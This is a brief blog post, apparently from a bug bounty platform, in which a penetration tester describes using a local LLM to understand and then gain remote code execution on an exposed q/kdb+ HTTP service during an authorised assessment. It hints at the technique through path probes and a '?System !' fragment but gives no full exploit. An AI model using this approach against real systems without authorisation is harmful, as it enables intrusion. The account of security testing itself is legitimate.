Synack Red Team member Nicolas Krassas used a local large language model (LLM) to decipher—and exploit—an unfamiliar database and programming language. Here, he recounts how he gained a big hacking advantage from an AI boost.
Introduction
During an assessment, I identified a critical vulnerability in a service exposed on port 7000 of an internal system. The endpoint was running q/kdb+, a high-performance time-series database and programming language widely used in financial services and data analytics. What I saw initially was something like the following screenshot. The service was running for several years on the environment, but initially it didn’t look like it could be exploited.

For example, I could add 2 numbers:
Not very exciting at that moment. But based on the headers, it was not something that I had seen before. Still, the service was there for about 3-4 years already without any vulnerability submissions on it.
Discovery and Initial Observations
Initial reconnaissance of the system at http://env:7000/ returned minimalistic HTML pages with legacy structures such as <frameset> and stylized <pre> outputs. Responses to unusual paths like ‘/?/’ and ‘/??/’ returned reflective tokens (e.g., ‘::’, ‘?/’), suggesting that the server was directly parsing and reflecting portions of the request path.
LLM to the rescue
With no clue on what I was dealing with, it was time for some extra support. Local LLM to the rescue!


So… what is q/kdb+, according to our LLM?
q/kdb+ is a column-oriented database and programming language created by Kx Systems, popular in financial institutions for its ability to handle massive volumes of time-series data. The ‘q’ language is tightly integrated with the kdb+ database, providing expressive querying, data analysis and scripting capabilities.
?System !



Security Impact
As this vulnerability represented a security risk, I submitted the RCE case to Synack where it ranked CVSS 10.
Conclusions / Takeaways
The service had been present in the environment for an extended period, but testing was restricted to specific, limited time windows. This made it challenging to determine which technologies were in use and to identify less obvious cases. Leveraging the capabilities of a local LLM provided a significant advantage and even with only the initial responses from the service, the LLM offered valuable guidance on where to focus the investigation and what indicators to pursue.